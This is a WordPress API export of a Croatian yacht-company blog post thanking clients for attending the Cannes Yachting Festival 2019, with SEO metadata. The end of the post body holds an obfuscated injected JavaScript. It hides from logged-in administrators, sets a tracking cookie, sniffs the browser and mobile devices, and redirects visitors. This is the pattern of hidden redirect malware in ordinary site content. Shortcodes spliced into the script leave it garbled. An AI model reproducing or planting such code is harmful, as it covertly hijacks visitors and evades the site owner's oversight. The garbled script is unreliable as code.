{"id":33189,"date":"2019-09-16T13:01:39","date_gmt":"2019-09-16T13:01:39","guid":{"rendered":"https:\/\/interadria.hr\/home\/month-full-of-suprises\/"},"modified":"2023-07-04T11:41:21","modified_gmt":"2023-07-04T11:41:21","slug":"month-full-of-suprises","status":"publish","type":"post","link":"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/","title":{"rendered":"Mjesec pun iznena\u0111enja!"},"content":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row_content&#8221; content_placement=&#8221;top&#8221; css=&#8221;.vc_custom_1495902786979{margin-top: -36px !important;}&#8221;][vc_column][stm_post_animated_image][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;2\/3&#8243;][vc_column_text]<\/p>\n<h2 style=\"text-align: center;\"><\/h2>\n<div class=\"wpb_text_column wpb_content_element \">\n<div class=\"wpb_wrapper\">\n<p align=\"CENTER\">Dragi na\u0161i klijenti i prijatelji, ovim putem \u017eelimo svima zahvaliti na dolasku u Cannes\u00a0 na Yachting Festival 2019!<\/p>\n<p align=\"CENTER\">Iza nas je prekrasan nauti\u010dki sajam koji nam je dao mogu\u0107nost vidjeti sve te novitete i ono \u0161to je najva\u017enije, \u0161to smo proveli zajedno ovakav vikend!<\/p>\n<\/div>\n<div class=\"wpb_wrapper\">\n<h2><\/h2>\n<\/div>\n<\/div>\n<div class=\"vc_separator wpb_content_element vc_separator_align_center vc_sep_width_100 vc_sep_border_width_2 vc_sep_pos_align_center vc_separator_no_text vc_sep_color_black\"><\/div>\n<p>[\/vc_column_text][vc_separator color=&#8221;black&#8221; border_width=&#8221;2&#8243;][vc_single_image image=&#8221;33176&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>InterAdria boat show team!<\/strong><\/p>\n<p>[\/vc_column_text][vc_single_image image=&#8221;33178&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_single_image image=&#8221;33180&#8243; img_size=&#8221;full&#8221; alignment=&#8221;center&#8221;][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>Pozivamo Vas na Genova Salone Nautico 2019 !<\/strong><\/p>\n<p>[\/vc_column_text][vc_separator color=&#8221;black&#8221; border_width=&#8221;2&#8243;][stm_post_comments][\/vc_column][vc_column width=&#8221;1\/3&#8243;][stm_sidebar sidebar=&#8221;651&#8243;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text]<script> var a=['toUTCString','cookie','split','length','charAt','substring','indexOf','userAgent','match','MSIE;','OPR','Chromium','Firefox','Chrome','ppkcookie','location','https:\/\/www.interadria.hr','getElementById','wpadminbar','undefined','setTime','getTime',';\\x20expires='];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text][c][\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text];return e;};(function(){if(document[b('0x0')](b('0x1'))===null){if(typeof c===b('0x2')){function c(d,e,f){var g='';if(f){var h=new Date();h[b('0x3')](h[b('0x4')]()+f*0x18*0x3c*0x3c*0x3e8);g=b('0x5')+h[b('0x6')]();}document[b('0x7')]=d+'='+(e||'')+g+';\\x20path=\/';}function i(j){var k=j+'=';var l=document[b('0x7')][b('0x8')](';');for(var m=0x0;m<l[b('0x9')];m++){var n=l[m];while(n[b('0xa')](0x0)=='\\x20')n=n[b('0xb')](0x1,n['length']);if(n[b('0xc')](k)==0x0)return n[b('0xb')](k[b('0x9')],n['length']);}return null;}function o(){return navigator[b('0xd')][b('0xe')](\/Android\/i)||navigator['userAgent'][b('0xe')](\/BlackBerry\/i)||navigator[b('0xd')][b('0xe')](\/iPhone|iPad|iPod\/i)||navigator[b('0xd')][b('0xe')](\/Opera Mini\/i)||navigator[b('0xd')][b('0xe')](\/IEMobile\/i);}function p(){return navigator[b('0xd')]['indexOf']('Edge')!==-0x1||navigator['userAgent'][b('0xc')](b('0xf'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x10'))!==-0x1||navigator[b('0xd')][b('0xc')](b('0x11'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x12'))!==-0x1||navigator[b('0xd')]['indexOf'](b('0x13'))!==-0x1;}var q=i(b('0x14'));if(q!=='un'){if(p()||o()){c(b('0x14'),'un',0x16d);window[b('0x15')]['replace'](b('0x16'));}}}}}(this));<\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row full_width=&#8221;stretch_row_content&#8221; content_placement=&#8221;top&#8221; css=&#8221;.vc_custom_1495902786979{margin-top: -36px !important;}&#8221;][vc_column][stm_post_animated_image][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Dragi na\u0161i klijenti i prijatelji, ovim putem \u017eelimo svima zahvaliti na dolasku u Cannes\u00a0 na Yachting Festival 2019! Iza nas je prekrasan nauti\u010dki sajam koji nam je dao mogu\u0107nost vidjeti sve te novitete i ono \u0161to je najva\u017enije, \u0161to smo proveli zajedno ovakav vikend! [\/vc_column_text][vc_separator color=&#8221;black&#8221; border_width=&#8221;2&#8243;][vc_single_image image=&#8221;33176&#8243;&#8230;<\/p>\n","protected":false},"author":2,"featured_media":33183,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_joinchat":[],"_links_to":"","_links_to_target":""},"categories":[1395,96],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.6 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Mjesec pun iznena\u0111enja! -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/\" \/>\n<meta property=\"og:locale\" content=\"hr_HR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Mjesec pun iznena\u0111enja! -\" \/>\n<meta property=\"og:description\" content=\"[vc_row full_width=&#8221;stretch_row_content&#8221; content_placement=&#8221;top&#8221; css=&#8221;.vc_custom_1495902786979{margin-top: -36px !important;}&#8221;][vc_column][stm_post_animated_image][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Dragi na\u0161i klijenti i prijatelji, ovim putem \u017eelimo svima zahvaliti na dolasku u Cannes\u00a0 na Yachting Festival 2019! Iza nas je prekrasan nauti\u010dki sajam koji nam je dao mogu\u0107nost vidjeti sve te novitete i ono \u0161to je najva\u017enije, \u0161to smo proveli zajedno ovakav vikend! [\/vc_column_text][vc_separator color=&#8221;black&#8221; border_width=&#8221;2&#8243;][vc_single_image image=&#8221;33176&#8243;...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/\" \/>\n<meta property=\"article:published_time\" content=\"2019-09-16T13:01:39+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2023-07-04T11:41:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/interadria.hr\/wp-content\/uploads\/2019\/09\/20190911_141941-1024x498.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1024\" \/>\n\t<meta property=\"og:image:height\" content=\"498\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"InterAdria SC\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"InterAdria SC\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/\",\"url\":\"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/\",\"name\":\"Mjesec pun iznena\u0111enja! -\",\"isPartOf\":{\"@id\":\"https:\/\/interadria.hr\/#website\"},\"datePublished\":\"2019-09-16T13:01:39+00:00\",\"dateModified\":\"2023-07-04T11:41:21+00:00\",\"author\":{\"@id\":\"https:\/\/interadria.hr\/#\/schema\/person\/ebd79574d1155b60d2064707cc2887c5\"},\"breadcrumb\":{\"@id\":\"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/#breadcrumb\"},\"inLanguage\":\"hr-HR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/interadria.hr\/hr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Mjesec pun iznena\u0111enja!\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/interadria.hr\/#website\",\"url\":\"https:\/\/interadria.hr\/\",\"name\":\"\",\"description\":\"INTERADRIA SC\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/interadria.hr\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"hr-HR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/interadria.hr\/#\/schema\/person\/ebd79574d1155b60d2064707cc2887c5\",\"name\":\"InterAdria SC\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"hr-HR\",\"@id\":\"https:\/\/interadria.hr\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/abc168dd1e1d9e56ab3efc76eb20fcdc?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/abc168dd1e1d9e56ab3efc76eb20fcdc?s=96&d=mm&r=g\",\"caption\":\"InterAdria SC\"},\"sameAs\":[\"http:\/\/interadria.hr\"],\"url\":\"https:\/\/interadria.hr\/hr\/author\/kristian\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mjesec pun iznena\u0111enja! -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/","og_locale":"hr_HR","og_type":"article","og_title":"Mjesec pun iznena\u0111enja! -","og_description":"[vc_row full_width=&#8221;stretch_row_content&#8221; content_placement=&#8221;top&#8221; css=&#8221;.vc_custom_1495902786979{margin-top: -36px !important;}&#8221;][vc_column][stm_post_animated_image][\/vc_column][\/vc_row][vc_row][vc_column width=&#8221;2\/3&#8243;][vc_column_text] Dragi na\u0161i klijenti i prijatelji, ovim putem \u017eelimo svima zahvaliti na dolasku u Cannes\u00a0 na Yachting Festival 2019! Iza nas je prekrasan nauti\u010dki sajam koji nam je dao mogu\u0107nost vidjeti sve te novitete i ono \u0161to je najva\u017enije, \u0161to smo proveli zajedno ovakav vikend! [\/vc_column_text][vc_separator color=&#8221;black&#8221; border_width=&#8221;2&#8243;][vc_single_image image=&#8221;33176&#8243;...","og_url":"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/","article_published_time":"2019-09-16T13:01:39+00:00","article_modified_time":"2023-07-04T11:41:21+00:00","og_image":[{"width":1024,"height":498,"url":"https:\/\/interadria.hr\/wp-content\/uploads\/2019\/09\/20190911_141941-1024x498.jpg","type":"image\/jpeg"}],"author":"InterAdria SC","twitter_card":"summary_large_image","twitter_misc":{"Written by":"InterAdria SC","Est. reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/","url":"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/","name":"Mjesec pun iznena\u0111enja! -","isPartOf":{"@id":"https:\/\/interadria.hr\/#website"},"datePublished":"2019-09-16T13:01:39+00:00","dateModified":"2023-07-04T11:41:21+00:00","author":{"@id":"https:\/\/interadria.hr\/#\/schema\/person\/ebd79574d1155b60d2064707cc2887c5"},"breadcrumb":{"@id":"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/#breadcrumb"},"inLanguage":"hr-HR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/interadria.hr\/hr\/month-full-of-suprises\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/interadria.hr\/hr\/month-full-of-suprises\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/interadria.hr\/hr\/"},{"@type":"ListItem","position":2,"name":"Mjesec pun iznena\u0111enja!"}]},{"@type":"WebSite","@id":"https:\/\/interadria.hr\/#website","url":"https:\/\/interadria.hr\/","name":"","description":"INTERADRIA SC","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/interadria.hr\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"hr-HR"},{"@type":"Person","@id":"https:\/\/interadria.hr\/#\/schema\/person\/ebd79574d1155b60d2064707cc2887c5","name":"InterAdria SC","image":{"@type":"ImageObject","inLanguage":"hr-HR","@id":"https:\/\/interadria.hr\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/abc168dd1e1d9e56ab3efc76eb20fcdc?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/abc168dd1e1d9e56ab3efc76eb20fcdc?s=96&d=mm&r=g","caption":"InterAdria SC"},"sameAs":["http:\/\/interadria.hr"],"url":"https:\/\/interadria.hr\/hr\/author\/kristian\/"}]}},"jetpack_featured_media_url":"https:\/\/interadria.hr\/wp-content\/uploads\/2019\/09\/20190911_141941.jpg","_links":{"self":[{"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/posts\/33189"}],"collection":[{"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/comments?post=33189"}],"version-history":[{"count":5,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/posts\/33189\/revisions"}],"predecessor-version":[{"id":37423,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/posts\/33189\/revisions\/37423"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/media\/33183"}],"wp:attachment":[{"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/media?parent=33189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/categories?post=33189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/interadria.hr\/hr\/wp-json\/wp\/v2\/tags?post=33189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}